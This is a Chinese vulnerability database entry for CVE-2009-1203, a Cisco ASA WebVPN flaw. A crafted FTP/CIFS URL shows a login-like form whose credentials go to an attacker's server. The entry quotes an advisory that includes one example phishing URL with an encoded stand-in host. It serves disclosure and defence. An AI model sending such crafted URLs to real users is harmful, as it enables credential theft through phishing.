Cisco ASA设备FTP或CIFS认证表单凭据泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117826 漏洞类型 其他
发布时间 2009-05-24 更新时间 2009-06-26
CVE编号 CVE-2009-1203 CNNVD-ID CNNVD-200906-388
漏洞平台 Hardware CVSS评分 6.0
|漏洞来源
https://www.exploit-db.com/exploits/33054
https://www.securityfocus.com/bid/35475
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-388
|漏洞详情
Cisco自适应安全设备(ASA)是可提供安全和VPN服务的模块化平台。当用户使用WebVPN访问FTP或CIFS目标时,所生成的URL中目标资源类型(scheme)和主机名首先经过Rot13编码,然后16进制编码后放在ASA的URL中。以下URL试图连接到ftp.example.com:/+CSCOE+/files/browse.html?code=init&;path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627aASA首先试图使用匿名凭据连接到FTP服务器或CIFS共享,如果失败会提示用户提供登录凭据。在查看的时候提交表单不会提示其用途,外观也非常类似于WebVPN的主登录页面。如果攻击者向用户发送了URL,用户很可能认为需要向WebVPN重新提交凭据,然后ASA会将凭据转发给攻击者的FTP或CIFS服务器。
|漏洞EXP
source: http://www.securityfocus.com/bid/35475/info

Cisco Adaptive Security Appliance (ASA) is prone to a vulnerability that can aid in phishing attacks.

An attacker can exploit this issue to display a fake login window that's visually similar to the device's login window, which may mislead users.

This issue is tracked by Cisco Bug ID CSCsy80709.

The attacker can exploit this issue to set up phishing attacks. Successful exploits could aid in further attacks.

Versions prior to ASA 8.0.4.34 and 8.1.2.25 are vulnerable.


The following example is available:

/+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a
|受影响的产品
Cisco Adaptive Security Appliance 8.2.1 Cisco Adaptive Security Appliance 8.1.2 Cisco Adaptive Security Appliance 8.0.2 11 Cisco Adaptive Security Appliance 8.1(2)19 Cisco Adaptive Securit
|参考资料

来源:BID
名称:35475
链接:http://www.securityfocus.com/bid/35475
来源:BUGTRAQ
名称:20090624Trustwave'sSpiderLabsSecurityAdvisoryTWSL2009-002
链接:http://www.securityfocus.com/archive/1/archive/1/504516/100/0/threaded